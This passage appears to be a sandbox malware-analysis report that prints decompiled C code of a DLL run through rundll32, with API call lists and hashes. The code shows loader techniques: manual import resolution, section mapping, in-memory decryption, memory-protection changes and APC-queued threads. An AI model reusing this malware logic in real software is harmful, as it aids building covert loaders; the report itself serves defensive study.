                    • memset.NTDLL ref: 6FFA1401
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
                    • Instruction ID: 8c9368ff6a6a11415ea4bf9af88d53ff6a9401a156d897be3f2c83d292c40fb5
                    • Opcode Fuzzy Hash: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
                    • Instruction Fuzzy Hash: B5211AB6D00209EFDB11CFA9C8849DEFBB9EF48354F11852AE605F7210D731AA458FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph
                    [graph image not captured; legend: Executed / Not Executed; function 6ffa1a0a-6ffa1b12, basic blocks calling LoadLibraryA and GetProcAddress]
                    C-Code - Quality: 100%
                    			E6FFA1A0A(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				_Unknown_base(*)()** _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				struct HINSTANCE__* _v28;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t47;
                    				intOrPtr* _t49;
                    				intOrPtr _t50;
                    				signed short _t51;
                    				_Unknown_base(*)()* _t53;
                    				CHAR* _t54;
                    				_Unknown_base(*)()* _t55;
                    				void* _t58;
                    				signed int _t59;
                    				_Unknown_base(*)()* _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				signed int _t68;
                    				void* _t69;
                    				CHAR* _t71;
                    				signed short* _t73;
                    
                    				_t69 = __edi;
                    				_v20 = _v20 & 0x00000000;
                    				_t59 =  *0x6ffa41cc;
                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                    				if(_t43 != 0) {
                    					_t45 = _t43 + __edi;
                    					_v12 = _t45;
                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                    					if(_t46 != 0) {
                    						while(1) {
                    							_t71 = _t46 + _t69;
                    							_t47 = LoadLibraryA(_t71); // executed
                    							_v28 = _t47;
                    							if(_t47 == 0) {
                    								break;
                    							}
                    							_v24 = _v24 & 0x00000000;
                    							 *_t71 = _t59 - 0x69b25f44;
                    							_t49 = _v12;
                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                    							_t50 =  *_t49;
                    							if(_t50 != 0) {
                    								L6:
                    								_t73 = _t50 + _t69;
                    								_v16 = _t61 + _t69;
                    								while(1) {
                    									_t51 =  *_t73;
                    									if(_t51 == 0) {
                    										break;
                    									}
                    									if(__eflags < 0) {
                    										__eflags = _t51 - _t69;
                    										if(_t51 < _t69) {
                    											L12:
                    											_t21 =  &_v8;
                    											 *_t21 = _v8 & 0x00000000;
                    											__eflags =  *_t21;
                    											_v24 =  *_t73 & 0x0000ffff;
                    										} else {
                    											_t65 = _a4;
                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                    												goto L12;
                    											} else {
                    												goto L11;
                    											}
                    										}
                    									} else {
                    										_t51 = _t51 + _t69;
                    										L11:
                    										_v8 = _t51;
                    									}
                    									_t53 = _v8;
                    									__eflags = _t53;
                    									if(_t53 == 0) {
                    										_t54 = _v24 & 0x0000ffff;
                    									} else {
                    										_t54 = _t53 + 2;
                    									}
                    									_t55 = GetProcAddress(_v28, _t54);
                    									__eflags = _t55;
                    									if(__eflags == 0) {
                    										_v20 = _t59 - 0x69b25ec5;
                    									} else {
                    										_t68 = _v8;
                    										__eflags = _t68;
                    										if(_t68 != 0) {
                    											 *_t68 = _t59 - 0x69b25f44;
                    										}
                    										 *_v16 = _t55;
                    										_t58 = 0x593682f4 + _t59 * 4;
                    										_t73 = _t73 + _t58;
                    										_t32 =  &_v16;
                    										 *_t32 = _v16 + _t58;
                    										__eflags =  *_t32;
                    										continue;
                    									}
                    									goto L23;
                    								}
                    							} else {
                    								_t50 = _t61;
                    								if(_t61 != 0) {
                    									goto L6;
                    								}
                    							}
                    							L23:
                    							_v12 = _v12 + 0x14;
                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                    							if(_t46 != 0) {
                    								continue;
                    							} else {
                    							}
                    							L26:
                    							goto L27;
                    						}
                    						_t60 = _t59 + 0x964da13a;
                    						__eflags = _t60;
                    						_v20 = _t60;
                    						goto L26;
                    					}
                    				}
                    				L27:
                    				return _v20;
                    			}

                    APIs
                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6FFA1A42
                    • GetProcAddress.KERNEL32(?,00000000), ref: 6FFA1AB4
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 5e9a7e1b293ecca39a341030d82984fafab6caeb9236e38720624cadfb43478f
                    • Instruction ID: 70dc338726bd95e1eb876735c01060828c232b7a14a41d8befb6b1c64ecf161c
                    • Opcode Fuzzy Hash: 5e9a7e1b293ecca39a341030d82984fafab6caeb9236e38720624cadfb43478f
                    • Instruction Fuzzy Hash: D0311475A0021ADFDB04CFA9C980AAEB7F4FF05355B1241AAD815EB250F732EA40CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E6FFA1B4A(void** __esi, PVOID* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void* _v16;
                    				long _t13;
                    
                    				_v16 = 0;
                    				asm("stosd");
                    				_v8 = 0;
                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                    				if(_t13 < 0) {
                    					_push(_t13);
                    					return __esi[6]();
                    				}
                    				return 0;
                    			}

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FFA13F4,00000002,00000000,?,?,00000000,?,?,6FFA13F4,00000000), ref: 6FFA1B77
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: 4d5d60b8e22b01e5a460bb98e334ba730d2d521efb878c3d31cfe628ee6648d5
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: 2AF019B590020CFFD7119FA5CC85C9FBBBDDB44394F104979B151D1050D6319E089A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph
                    [graph image not captured; legend: Executed / Not Executed; function 6ffa1e91-6ffa1f72, basic blocks calling 6ffa1d8b, GetModuleHandleA, GetProcAddress (five times), 6ffa1382 and 6ffa1e7c]
                    C-Code - Quality: 100%
                    			E6FFA1E91(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v8;
                    				_Unknown_base(*)()* _t29;
                    				_Unknown_base(*)()* _t33;
                    				_Unknown_base(*)()* _t36;
                    				_Unknown_base(*)()* _t39;
                    				_Unknown_base(*)()* _t42;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t50;
                    				intOrPtr _t56;
                    
                    				_t56 = E6FFA1D8B(0x20);
                    				if(_t56 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t50 = GetModuleHandleA( *0x6ffa41d0 + 0x6ffa5014);
                    					_v8 = 0x7f;
                    					_t29 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa50e1);
                    					 *(_t56 + 0xc) = _t29;
                    					if(_t29 == 0) {
                    						L8:
                    						E6FFA1E7C(_t56);
                    					} else {
                    						_t33 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa50f1);
                    						 *(_t56 + 0x10) = _t33;
                    						if(_t33 == 0) {
                    							goto L8;
                    						} else {
                    							_t36 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa5104);
                    							 *(_t56 + 0x14) = _t36;
                    							if(_t36 == 0) {
                    								goto L8;
                    							} else {
                    								_t39 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa5119);
                    								 *(_t56 + 0x18) = _t39;
                    								if(_t39 == 0) {
                    									goto L8;
                    								} else {
                    									_t42 = GetProcAddress(_t50,  *0x6ffa41d0 + 0x6ffa512f);
                    									 *(_t56 + 0x1c) = _t42;
                    									if(_t42 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                    										_t46 = E6FFA1382(_t56, _a12); // executed
                    										_v8 = _t46;
                    										if(_t46 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a16 = _t56;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}

                    APIs
                      • Part of subcall function 6FFA1D8B: HeapAlloc.KERNEL32(00000000,?,6FFA188E,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA1D97
                    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6FFA123E,?,?,?,?,00000002,00000000,?,?), ref: 6FFA1EB5
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1ED7
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1EED
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F03
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F19
                    • GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F2F
                      • Part of subcall function 6FFA1382: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6FFA13DF
                      • Part of subcall function 6FFA1382: memset.NTDLL ref: 6FFA1401
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 1632424568-0
                    • Opcode ID: 35487213f554e93643777cb2254bad575d2c631c15d537eb25e917b65957cfe0
                    • Instruction ID: 6c7c67bd14982b55f6ba083089f97e311de28c796a3d9648ca0f48e2f3641bbe
                    • Opcode Fuzzy Hash: 35487213f554e93643777cb2254bad575d2c631c15d537eb25e917b65957cfe0
                    • Instruction Fuzzy Hash: D2215AB560070ADFDB01DF68C880E9A7BFCFF09694B028426F81AC7211E731E9158FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph
                    [graph image not captured; legend: Executed / Not Executed; function 6ffa1da0-6ffa1e79, basic blocks calling InterlockedIncrement, InterlockedDecrement, HeapCreate, HeapDestroy, SleepEx, CloseHandle, 6ffa144a and 6ffa1d2d]
                    C-Code - Quality: 86%
                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                    				long _v8;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				char _t9;
                    				void* _t10;
                    				void* _t18;
                    				void* _t23;
                    				void* _t36;
                    
                    				_push(__ecx);
                    				_t9 = _a8;
                    				_v8 = 1;
                    				if(_t9 == 0) {
                    					_t10 = InterlockedDecrement(0x6ffa4188);
                    					__eflags = _t10;
                    					if(_t10 == 0) {
                    						__eflags =  *0x6ffa418c;
                    						if( *0x6ffa418c != 0) {
                    							_t36 = 0x2328;
                    							while(1) {
                    								SleepEx(0x64, 1);
                    								__eflags =  *0x6ffa4198;
                    								if( *0x6ffa4198 == 0) {
                    									break;
                    								}
                    								_t36 = _t36 - 0x64;
                    								__eflags = _t36;
                    								if(_t36 > 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							CloseHandle( *0x6ffa418c);
                    						}
                    						HeapDestroy( *0x6ffa4190);
                    					}
                    				} else {
                    					if(_t9 == 1 && InterlockedIncrement(0x6ffa4188) == 1) {
                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                    						_t41 = _t18;
                    						 *0x6ffa4190 = _t18;
                    						if(_t18 == 0) {
                    							L6:
                    							_v8 = 0;
                    						} else {
                    							 *0x6ffa41b0 = _a4;
                    							asm("lock xadd [eax], edi");
                    							_push( &_a8);
                    							_t23 = E6FFA1D2D(E6FFA149B, E6FFA144A(_a12, 1, 0x6ffa4198, _t41));
                    							 *0x6ffa418c = _t23;
                    							if(_t23 == 0) {
                    								asm("lock xadd [esi], eax");
                    								goto L6;
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}

                    APIs
                    • InterlockedIncrement.KERNEL32(6FFA4188), ref: 6FFA1DC2
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6FFA1DD7
                      • Part of subcall function 6FFA1D2D: CreateThread.KERNELBASE ref: 6FFA1D44
                      • Part of subcall function 6FFA1D2D: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6FFA1D59
                      • Part of subcall function 6FFA1D2D: GetLastError.KERNEL32(00000000), ref: 6FFA1D64
                      • Part of subcall function 6FFA1D2D: TerminateThread.KERNEL32(00000000,00000000), ref: 6FFA1D6E
                      • Part of subcall function 6FFA1D2D: CloseHandle.KERNEL32(00000000), ref: 6FFA1D75
                      • Part of subcall function 6FFA1D2D: SetLastError.KERNEL32(00000000), ref: 6FFA1D7E
                    • InterlockedDecrement.KERNEL32(6FFA4188), ref: 6FFA1E2A
                    • SleepEx.KERNEL32(00000064,00000001), ref: 6FFA1E44
                    • CloseHandle.KERNEL32 ref: 6FFA1E60
                    • HeapDestroy.KERNEL32 ref: 6FFA1E6C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                    • String ID:
                    • API String ID: 2110400756-0
                    • Opcode ID: 22c1a011eef3d9cc4a8a57b404c3e62b4855ba5737fa8becaa160795f7758eeb
                    • Instruction ID: 9b4cd8a0f5edeeab6af3188e2df1190649b5bb8a3bbdea015b534caf91472c27
                    • Opcode Fuzzy Hash: 22c1a011eef3d9cc4a8a57b404c3e62b4855ba5737fa8becaa160795f7758eeb
                    • Instruction Fuzzy Hash: 6D219D31610605EBDF028FA9CCC4A4E7BB8FF56778752802AE515D3260EB32B9208F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E6FFA1D2D(long _a4, DWORD* _a12) {
                    				_Unknown_base(*)()* _v0;
                    				void* _t4;
                    				long _t6;
                    				long _t11;
                    				void* _t13;
                    
                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ffa41cc, 0, _a12); // executed
                    				_t13 = _t4;
                    				if(_t13 != 0) {
                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                    					if(_t6 == 0) {
                    						_t11 = GetLastError();
                    						TerminateThread(_t13, _t11);
                    						CloseHandle(_t13);
                    						_t13 = 0;
                    						SetLastError(_t11);
                    					}
                    				}
                    				return _t13;
                    			}

                    APIs
                    • CreateThread.KERNELBASE ref: 6FFA1D44
                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6FFA1D59
                    • GetLastError.KERNEL32(00000000), ref: 6FFA1D64
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6FFA1D6E
                    • CloseHandle.KERNEL32(00000000), ref: 6FFA1D75
                    • SetLastError.KERNEL32(00000000), ref: 6FFA1D7E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                    • String ID:
                    • API String ID: 3832013932-0
                    • Opcode ID: e8c56b45973bfc823bfca848450333328b84f1469fab449ce72a43468427b6da
                    • Instruction ID: 4b339dd1501ca466043efe3476dac1292b6b113e6c52c4baebf0a4a85d3d665e
                    • Opcode Fuzzy Hash: e8c56b45973bfc823bfca848450333328b84f1469fab449ce72a43468427b6da
                    • Instruction Fuzzy Hash: 00F08232114A20FBCB125FA08C0DF4FBF68FF0A736F018404F61591264D72398349BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetEnvironmentVariableW.KERNEL32(70037558,?,0000060C), ref: 6FFECD5C
                    • Sleep.KERNELBASE(00000010), ref: 6FFECE46
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: EnvironmentSleepVariable
                    • String ID: .$3
                    • API String ID: 1164960984-2208969288
                    • Opcode ID: 5f6dbbf57cb9b56e344d09c040573a26ca5c195e47ee713072fcb6e962a7a218
                    • Instruction ID: bd11c32b1ae336e47c876e3b1425ae6335d58de122f330f4c70983161a0f2bd7
                    • Opcode Fuzzy Hash: 5f6dbbf57cb9b56e344d09c040573a26ca5c195e47ee713072fcb6e962a7a218
                    • Instruction Fuzzy Hash: 3D1372325071A0CEE319CF2ACB587743BB2BB47325F2445EAF54D8A7A6D6384584CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E6FFA1B8C(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				unsigned int _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				void* _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void* _v40;
                    				signed int _v48;
                    				signed int _v52;
                    				intOrPtr _t46;
                    				void* _t53;
                    				intOrPtr _t54;
                    				intOrPtr _t57;
                    				signed int _t66;
                    				intOrPtr _t68;
                    				intOrPtr _t83;
                    				void* _t84;
                    
                    				_t83 =  *0x6ffa41b0;
                    				_t46 = E6FFA1FE8(_t83,  &_v24,  &_v16);
                    				_v20 = _t46;
                    				if(_t46 == 0) {
                    					asm("sbb ebx, ebx");
                    					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                    					_t84 = _t83 + _v24;
                    					_v40 = _t84;
                    					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                    					_v28 = _t53;
                    					if(_t53 == 0) {
                    						_v20 = 8;
                    					} else {
                    						_v8 = _v8 & 0x00000000;
                    						if(_t66 <= 0) {
                    							_t54 =  *0x6ffa41cc;
                    						} else {
                    							_t68 = _a4;
                    							_t57 = _t53 - _t84;
                    							_t13 = _t68 + 0x6ffa5137; // 0x6ffa5137
                    							_v32 = _t57;
                    							_v36 = _t57 + _t13;
                    							_v12 = _t84;
                    							while(1) {
                    								asm("movsd");
                    								asm("movsd");
                    								asm("movsd");
                    								E6FFA19D9(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                    								_v12 = _v12 + 0x1000;
                    								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                    								_v8 = _v8 + 1;
                    								 *0x6ffa41cc = _t54;
                    								if(_v8 >= _t66) {
                    									break;
                    								}
                    								_t57 = _v32;
                    							}
                    						}
                    						if(_t54 != 0x69b25f44) {
                    							_v20 = 9;
                    						} else {
                    							memcpy(_v40, _v28, _v16);
                    						}
                    						VirtualFree(_v28, 0, 0x8000); // executed
                    					}
                    				}
                    				return _v20;
                    			}

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,6FFA1552,00003000,00000004,?,?,6FFA1552,00000001), ref: 6FFA1BE2
                    • memcpy.NTDLL(?,?,6FFA1552,?,?,6FFA1552,00000001), ref: 6FFA1C7D
                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6FFA1552,00000001), ref: 6FFA1C98
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocFreememcpy
                    • String ID: Aug 10 2021
                    • API String ID: 4010158826-2753409178
                    • Opcode ID: 574fd3ea9c40cb38af4f302b76da47fadb6a1d91adb01e6a26f2f794c8b94783
                    • Instruction ID: 1976acf047ca763e131782b778e3a7cb274a29a87fc56840b7191bf7f5255c01
                    • Opcode Fuzzy Hash: 574fd3ea9c40cb38af4f302b76da47fadb6a1d91adb01e6a26f2f794c8b94783
                    • Instruction Fuzzy Hash: BA311D71E10219EFDB01CFA8C981BEEB7B5BF09314F214159E915BB280D772AA15CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 87%
                    			E6FFA149B(void* __ecx, intOrPtr _a4) {
                    				long _t3;
                    				int _t4;
                    				int _t9;
                    				void* _t13;
                    
                    				_t13 = GetCurrentThread();
                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                    				if(_t3 != 0) {
                    					SetThreadPriority(_t13, 0xffffffff); // executed
                    				}
                    				_t4 = E6FFA14FE(_a4); // executed
                    				_t9 = _t4;
                    				if(_t9 == 0) {
                    					SetThreadPriority(_t13, _t4);
                    				}
                    				asm("lock xadd [eax], ecx");
                    				return _t9;
                    			}

                    APIs
                    • GetCurrentThread.KERNEL32 ref: 6FFA149E
                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6FFA14A9
                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6FFA14BC
                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6FFA14CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$Priority$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1452675757-0
                    • Opcode ID: 05322f4f0a067e79b7eb53289ff32df04a40c2ca5a2108a9cc9d3251cb6883a2
                    • Instruction ID: ac55d6330227ba279be554e551bebd22c16f7ecf3d7724850b5f75d80786fe4c
                    • Opcode Fuzzy Hash: 05322f4f0a067e79b7eb53289ff32df04a40c2ca5a2108a9cc9d3251cb6883a2
                    • Instruction Fuzzy Hash: 31E06D31315A14ABD6126B2D4C85F6F765CEF836357038225F920D22E0CB56982189A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 87%
                    			E6FFA2042(void* __eax, void* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				long _v20;
                    				int _t43;
                    				long _t54;
                    				signed int _t57;
                    				void* _t58;
                    				signed int _t60;
                    
                    				_v12 = _v12 & 0x00000000;
                    				_t57 =  *0x6ffa41cc;
                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                    				_v8 = _v8 & 0x00000000;
                    				if(_v16 <= 0) {
                    					L12:
                    					return _v12;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t60 = _v12;
                    					if(_t60 != 0) {
                    						goto L12;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t60 >= 0) {
                    						asm("bt [esi+0x24], eax");
                    						if(__eflags >= 0) {
                    							L8:
                    							_t54 = _t57 - 0x69b25f40;
                    							L9:
                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                    							if(_t43 == 0) {
                    								_v12 = GetLastError();
                    							}
                    							_v8 = _v8 + 1;
                    							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                    							if(_v8 < _v16) {
                    								continue;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						asm("bt [esi+0x24], eax");
                    						_t54 = _t57 - 0x69b25f42;
                    						if(__eflags >= 0) {
                    							goto L9;
                    						}
                    						goto L8;
                    					}
                    					asm("bt [esi+0x24], eax");
                    					if(_t60 >= 0) {
                    						_t54 = _t57 - 0x69b25f24;
                    					} else {
                    						_t54 = _t57 - 0x69b25f04;
                    					}
                    					goto L9;
                    				}
                    				goto L12;
                    			}

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6FFA207B
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6FFA20F0
                    • GetLastError.KERNEL32 ref: 6FFA20F6
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
